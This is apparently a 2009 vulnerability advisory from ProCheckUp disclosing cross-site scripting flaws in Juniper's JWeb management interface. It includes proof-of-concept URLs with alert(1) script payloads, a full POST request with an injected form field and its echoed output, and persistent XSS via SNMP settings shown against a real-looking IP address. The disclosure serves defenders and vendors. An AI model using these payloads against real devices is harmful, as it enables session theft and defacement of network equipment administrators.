New Banner 2

Services

Find out more about ProCheckUp's services including: Penetration Testing, PCI QSA and PCI ASV

Request a Callback

PR09-10 - Juniper JunOS JWeb authenticated XSS

Vulnerability found:
25 June 2009
Vendor informed:
31 July 2009
Severity level:
Medium
Credits:
Richard Brain of ProCheckUp Ltd (www.procheckup.com)
Description:
There is a Cross-site Scripting vulnerability on Junipers, JUNOS web interface. JwWeb provides a webinterface which allows JUNOS to be controlled by a webinterface.
ProCheckUp has found by making a malformed authenticated request to the JWeb interface, that vanilla cross site scripting (XSS) attacks are possible.

Consequences

An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website.

Successfully tested on

Juniper Networks Juniper Web Management (JWeb) Version: 8.5R1.14


This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.
Proof of concept:
1) http://target-domain.foo/jexec?JEXEC_MODE=JEXEC_MODE_RELAY_OUTPUT&JEXEC_OUTID=")></script><script>alert(1)</script>&JEXEC_RPC=request-background-task-start-junoscript
2) http://target-domain.foo/scripter.php?act="><script>alert(1)</script>&debug=1&ifid=1&refresh-time=1&
3) http://target-domain.foo/scripter.php?refresh-time="><script>alert(1)</script>
4) http://target-domain.foo/scripter?act=header&ifid=')"><script>alert(1)</script>&
5) http://target-domain.foo/configuration?m[]=history&action=rollback&revision="><script>alert(1)</script>

6) the m[] parameter is vulnerable to XSS across multiple programs, the m[] parameter is used by JWeb to select a program to run.
http://target-domain.foo/monitor?m[]='><script>alert(1)</script>
http://target-domain.foo/manage?m[]='><script>alert(1)</script>
http://target-domain.foo/events?m[]='><script>alert(1)</script>
http://target-domain.foo/configuration?m[]='><script>alert(1)</script>
http://target-domain.foo/alarms?m[]='><script>alert(1)</script>
http://target-domain.foo/?m[]='><script>alert(1)</script>
http://target-domain.foo/?action=browse&m[]="><script>alert(1)</SCRIPT>&path=/var/crash&

7) The configuration program is vulnerable to a POST XSS attack

POST /configuration?m[]=wizards&m[]=https HTTP/1.1
Host: target-domain.foo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://target-domain.foo/configuration?m[]=wizards&m[]=https&start=true
Cookie: PHPSESSID=faf6133c44481c24b61a04f4c0ef57be;
Content-Type: application/x-www-form-urlencoded
Content-Length: 782
https-allifls-hidden=false&https-interfaces-hidden=false&https-cert-hidden=false&local-cert-delete-hidden=true&wizard-next=b7777"><script>alert(1)</script>095b2419adf&https-allifls=on&https-allifls-original=on&xnmssltoggle=on&http-allifls-hidden=false&http-interfaces-hidden=false&certs-hidden=false&right-http-interfaces-duallist%5b%5d=lo0.16384&http-allifls=on&http-allifls-original=off&wizard-ids=&current-page=main&http-enable-hidden=false&text-hidden=false&wizard-args=&wizard-previous=&xnmssltoggle-hidden=false&httpstoggle-hidden=false&right-https-interfaces-duallist%5b%5d=lo0.16384&left-http-interfaces-duallist%5b%5d=em0.0&http-enable-original=on&httpstoggle-original=off&apply-button=Apply&xnmssltoggle-original=off&xnmssl-cert-hidden=false&http-enable=on&httpstoggle=on&wizard-mode=&http-interfaces-original=Array

RESULTS (part of):-
</script>
<!--
current wizard: firewall-acl
current page : b7777"><script>alert(1)</script>095b2419adf
current page number: 0
-->
</form> </td>
</tr>
</table>

8) SNMP parameters are vulnerable to a persistent XSS attack, which allows permanent alteration to page code when viewd.
SNMP parmaters can be viewed and entered on this page, http://212.111.49.111/configuration?m[]=wizards&m[]=snmp&start=true
The "Contact Information","System Description","Local Engine ID","System Location","System Name Override"

The following URLS when accessed cause the XSS attacks to be executed
http://212.111.49.111/configuration?m[]=wizards&m[]=snmp&start=true
http://212.111.49.111/configuration?m[]=viewedit&m[]=viewtext

Note: the previous examples were tested on IE7 and FF2.
References:
ProCheckUp Vulnerabilities
http://www.procheckup.com/vulnerability_manager
Legal:
Copyright 2009 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Back to Vulnerabilities List